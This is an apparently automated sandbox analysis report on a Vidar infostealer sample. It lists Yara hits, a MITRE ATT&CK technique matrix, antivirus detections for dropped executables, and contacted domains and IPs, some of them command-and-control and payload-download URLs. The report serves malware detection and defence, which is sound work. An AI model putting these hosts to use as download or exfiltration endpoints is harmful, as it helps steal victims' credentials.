Source: Yara match	File source: 00000022.00000002.3250023944.000000000172B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3244325269.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2710567698.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2853865505.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3193860810.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D0D60 sqlite3_bind_parameter_name,	14_2_6D5D0D60
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D0C40 sqlite3_bind_zeroblob,	14_2_6D5D0C40
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F8EA0 sqlite3_clear_bindings,	14_2_6D4F8EA0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	14_2_6D5D0B40
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F6410 bind,WSAGetLastError,	14_2_6D4F6410
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	14_2_6D4FC050
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F6070 PR_Listen,	14_2_6D4F6070
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4FC030 sqlite3_bind_parameter_count,	14_2_6D4FC030
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F60B0 listen,WSAGetLastError,	14_2_6D4F60B0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4F63C0 PR_Bind,	14_2_6D4F63C0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D4822D0 sqlite3_bind_blob,	14_2_6D4822D0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	21 Scheduled Task/Job	1 Extra Window Memory Injection	13 Obfuscated Files or Information	Security Account Manager	238 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	112 Process Injection	12 Software Packing	NTDS	1081 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	21 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	381 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	381 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ZiYbk6W[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ZiYbk6W[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H9TU4oY[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	47%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://cineft.online/	0%	Avira URL Cloud	safe
https://community.fa_	0%	Avira URL Cloud	safe
https://diffuculttan.xyz/api	100%	Avira URL Cloud	phishing
https://effecterectz.xyz/apif	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/apiK	100%	Avira URL Cloud	malware
https://tacitglibbr.biz/osc	100%	Avira URL Cloud	malware
https://effecterectz.xyz/apiK	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/9	100%	Avira URL Cloud	malware
https://awake-weaves.cyou:443/api	100%	Avira URL Cloud	malware
https://debonairnukk.xyz/api/p8	100%	Avira URL Cloud	phishing
https://diffuculttan.xyz:443/api	100%	Avira URL Cloud	phishing
https://effecterectz.xyz/x	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exe&G	0%	Avira URL Cloud	safe
https://diffuculttan.xyz/api.0	100%	Avira URL Cloud	malware
https://deafeninggeh.biz/Cz	100%	Avira URL Cloud	malware
https://deafeninggeh.biz/apiyc	100%	Avira URL Cloud	malware
https://debonairnukk.xyz/api	100%	Avira URL Cloud	phishing
https://shineugler.biz/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
services.addons.mozilla.org	151.101.193.91	true	false	high
immureprech.biz	104.21.22.222	true	false	high
deafeninggeh.biz	104.21.64.1	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
shineugler.biz	104.21.51.88	true	true	unknown
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
tacitglibbr.biz	104.21.50.161	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
www.google.com	172.217.19.228	true	false	high
star-mini.c10r.facebook.com	157.240.196.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.129	true	false	high
plus.l.google.com	142.250.181.46	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
youtube.com	142.250.181.78	true	false	high
youtube-ui.l.google.com	216.58.208.238	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
play.google.com	172.217.19.206	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	false		high
http://185.215.113.206/	false		high
deafeninggeh.biz	false		high
https://drive-connect.cyou/api	false		high
https://cineft.online/	true	Avira URL Cloud: safe	unknown
effecterectz.xyz	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
https://immureprech.biz/api	false		high
debonairnukk.xyz	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false		high
tacitglibbr.biz	false		high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false		high
https://shineugler.biz/api	true	Avira URL Cloud: safe	unknown
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/ac/?q=	232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l	firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/apiK	H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://datastudio.google.com/embed/reporting/	firefox.exe, 00000020.00000003.3323492995.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320833254.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl	firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3002936663.000001D763AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://completion.amazon.com/search/complete?q=	firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	false		high
https://identity.mozilla.com/ids/ecosystem_telemetryU	firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/apif	H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542498583.0000000001669000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/w3c/csswg-drafts/issues/4650	firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tacitglibbr.biz/osc	c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/api	H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://youtube.com/	firefox.exe, 00000020.00000003.2991618595.000001D7660D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://awake-weaves.cyou:443/api	c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
